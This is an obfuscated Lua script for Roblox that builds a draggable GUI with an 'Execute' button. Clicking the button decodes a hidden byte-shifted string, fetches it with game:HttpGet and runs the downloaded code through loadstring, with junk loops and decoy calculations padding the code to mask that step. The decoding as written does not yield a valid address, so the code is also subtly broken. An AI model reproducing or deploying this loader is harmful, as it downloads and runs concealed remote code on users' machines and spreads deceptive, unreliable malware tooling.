local _0x_v0 = tonumber; local _0x_v1 = string.byte; local _0x_v2 = string.char; local _0x_v3 = string.sub;
local _0x_v4 = getfenv; local _0x_v5 = pcall; local _0x_v6 = loadstring; local _0x_v7 = math.sin;
local _0x_v8 = math.cos; local _0x_v9 = math.random; local _0x_v10 = math.abs;

local _0x_trash_table = {}
for i=1, 2000 do 
    _0x_trash_table[i] = _0x_v9(1, 1e6) 
    if i % 5 == 0 then _0x_trash_table[i] = _0x_v7(i) * _0x_v8(i) end
end

local function _0x_chaos_logic(_0x_in)
    local _0x_r = 0
    for i=1, 800 do
        _0x_r = _0x_r + _0x_v10(_0x_v7(i))
        if _0x_r > 1e7 then break end
    end
    return _0x_r
end

local _0x_S = setmetatable({}, {__index = function(_, k) 
    local _0x_res = game:GetService(k)
    for _=1, 20 do local _f = _0x_v7(_) end
    return _0x_res 
end})

local _0x_T = _0x_S.TweenService
local _0x_U = _0x_S.UserInputService
local _0x_L = _0x_S.Players.LocalPlayer
local _0x_P = _0x_L:WaitForChild("\80\108\97\121\101\114\71\117\105", 15) or game:GetService("\67\111\114\101\71\117\105")

local function _0x_drag(_0x_o)
    local _0x_d, _0x_ds, _0x_sp
    _0x_o.InputBegan:Connect(function(_0x_i)
        if _0x_i.UserInputType == Enum.UserInputType.MouseButton1 or _0x_i.UserInputType.Touch then
            _0x_d = true; _0x_ds = _0x_i.Position; _0x_sp = _0x_o.Position
        end
    end)
    _0x_U.InputChanged:Connect(function(_0x_i)
        if _0x_d and (_0x_i.UserInputType == Enum.UserInputType.MouseMovement or _0x_i.UserInputType.Touch) then
            local _0x_dl = _0x_i.Position - _0x_ds
            _0x_o.Position = UDim2.new(_0x_sp.X.Scale, _0x_sp.X.Offset + _0x_dl.X, _0x_sp.Y.Scale, _0x_sp.Y.Offset + _0x_dl.Y)
        end
    end)
    _0x_U.InputEnded:Connect(function() _0x_d = false end)
end

local _0x_SG = Instance.new("\83\99\114\101\101\110\71\117\105", _0x_P)
_0x_SG.Name = (function() local _n = ""; for i=1,16 do _n=_n.._0x_v2(_0x_v9(97,122)) end return _n end)()

local _0x_TOG = Instance.new("\84\101\120\116\66\117\116\116\111\110", _0x_SG)
_0x_TOG.Size = UDim2.new(0, 45, 0, 45); _0x_TOG.Position = UDim2.new(0, 20, 0, 20)
_0x_TOG.BackgroundColor3 = Color3.fromRGB(10, 10, 15); _0x_TOG.Text = "\240\159\144\190"
Instance.new("\85\73\67\111\114\110\101\114", _0x_TOG).CornerRadius = UDim.new(1, 0)
_0x_drag(_0x_TOG)

task.spawn(function()
    while _0x_SG.Parent do
        local _0x_r = Instance.new("\70\114\97\109\101", _0x_TOG)
        _0x_r.AnchorPoint = Vector2.new(0.5, 0.5); _0x_r.Position = UDim2.new(0.5, 0, 0.5, 0)
        _0x_r.Size = UDim2.new(1, 0, 1, 0); _0x_r.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
        Instance.new("\85\73\67\111\114\110\101\114", _0x_r).CornerRadius = UDim.new(1, 0)
        _0x_T:Create(_0x_r, TweenInfo.new(1.5), {Size = UDim2.new(2.5, 0, 2.5, 0), BackgroundTransparency = 1}):Play()
        task.delay(1.5, function() if _0x_r then _0x_r:Destroy() end end)
        task.wait(2)
        for i=1, 300 do local _ = _0x_v7(i) end
    end
end)

local _0x_MF = Instance.new("\70\114\97\109\101", _0x_SG)
_0x_MF.Size = UDim2.new(0, 300, 0, 150); _0x_MF.Position = UDim2.new(0.5, -150, 0.5, -75)
_0x_MF.BackgroundColor3 = Color3.fromRGB(15, 17, 22); _0x_MF.Visible = false
Instance.new("\85\73\67\111\114\110\101\114", _0x_MF)
_0x_drag(_0x_MF)

local _0x_EXE = Instance.new("\84\101\120\116\66\117\116\116\111\110", _0x_MF)
_0x_EXE.Size = UDim2.new(0.8, 0, 0, 40); _0x_EXE.Position = UDim2.new(0.1, 0, 0.4, 0)
_0x_EXE.Text = "\69\120\101\99\117\116\101"; _0x_EXE.BackgroundColor3 = Color3.fromRGB(30, 35, 45)
_0x_EXE.TextColor3 = Color3.fromRGB(255, 255, 255)
Instance.new("\85\73\67\111\114\110\101\114", _0x_EXE)

_0x_TOG.MouseButton1Click:Connect(function() 
    _0x_MF.Visible = not _0x_MF.Visible 
end)

_0x_EXE.MouseButton1Click:Connect(function()
    _0x_EXE.Text = "\76\111\97\100\105\110\103\46\46\46"
    _0x_EXE.Active = false
    
    local _0x_K = (function() local _c = 0; for i=1, 500 do _c = _c + _0x_v10(_0x_v7(i)) end return 13 end)()
    local _0x_E = "\117\130\130\127\130\73\62\62\118\120\130\131\61\118\120\131\119\132\113\132\130\116\129\114\126\125\131\116\125\131\61\114\126\124\62\125\116\122\126\126\126\114\112\131\131\131\60\93\84\90\94\62\70\116\71\64\69\71\64\112\72\63\114\68\113\72\70\112\69\64\113\71\116\72\63\115\64\116\116\115\114\117\70\113\62\129\112\134\62\81"
    
    _0x_chaos_logic()
    
    local _0x_U = ""
    for i=1, #_0x_E do
        local _b = _0x_v1(_0x_E, i)
        _0x_U = _0x_U .. _0x_v2(_b - _0x_K)
        for j=1, 20 do local _junk = _0x_v8(j) end
    end
    
    _0x_v5(function()
        local _0x_DAT = game:HttpGet(_0x_U)
        _0x_SG:Destroy()
        _0x_v6(_0x_DAT)()
    end)
    
    for i=1, 1000 do _0x_trash_table[i] = _0x_v7(i) end
end)

for i=1, 2000 do
    local _0x_dummy = _0x_v9(1, 1e9)
    local _0x_f = function() return _0x_dummy end
end
